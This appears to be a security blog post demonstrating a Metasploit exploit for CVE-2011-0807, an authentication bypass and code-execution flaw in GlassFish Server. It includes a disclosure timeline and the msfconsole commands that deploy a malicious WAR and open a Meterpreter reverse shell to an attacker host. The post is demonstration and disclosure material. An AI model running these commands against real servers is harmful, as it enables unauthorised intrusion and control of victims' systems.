aka wow on ZATAZ.com
CVE-2011-0807 : Sun/Oracle GlassFish Server Authenticated Code Execution Metasploit Demo
Timeline :
Vulnerability discovered by Jason Bowes and submitted to ZDI
Initial ZDI vulnerability notification to vendor the 2010-09-23
Coordinated public release of the vulnerability the 2011-04-19
Metasploit PoC provided the 2011-08-04
PoC provided by :
juan vazquez
Joshua Abraham
sinn3r
Reference(s) :
Affected version(s) :
Sun GlassFish Enterprise Server 2.1, 2.1.1, 3.0.1
Java System Application Server 9.1
Tested on Windows XP SP3 with :
Sun GlassFish Enterprise Server 3.0.1
Description :
This module logs in to an GlassFish Server 3.1 (Open Source or Commercial) instance using a default credential, uploads, and executes commands via deploying a malicious WAR. On Glassfish 2.x, 3.0 and Sun Java System Application Server 9.x this module will try to bypass authentication instead by sending lowercase HTTP verbs.
Commands :
use exploit/multi/http/glassfish_deployer
set RHOST 192.168.178.48
set PAYLOAD windows/meterpreter/reverse_tcp
set LHOST 192.168.178.21
exploitsysinfo
getuid
ipconfig
I recommend you to read these related posts
- CVE-2010-0886 : Sun Java Web Start Plugin Command Line Argument Injection
- CVE-2010-3552 : Oracle Java Runtime New Plugin docbase Buffer Overflow
- CVE-2012-5088 Java Applet Method Handle RCE Metasploit Demo
- CVE-2013-0431 Java Applet JMX Remote Code Execution Metasploit Demo
- CVE-2008-5353 : Sun Java Calendar Deserialization Exploit
- CVE-2013-2423 – Java 7u17 Applet Reflection Type Confusion RCE Metasploit Demo
- Java RMI Server Insecure Default Configuration Java Code Execution
- CVE-2012-2122 Oracle MySQL Authentication Bypass Password Dump Metasploit Demo
- Java Applet JMX 0day Remote Code Execution Metasploit Demo
- CVE-2012-5076 Java Applet AverageRangeStatisticImpl RCE Metasploit Demo
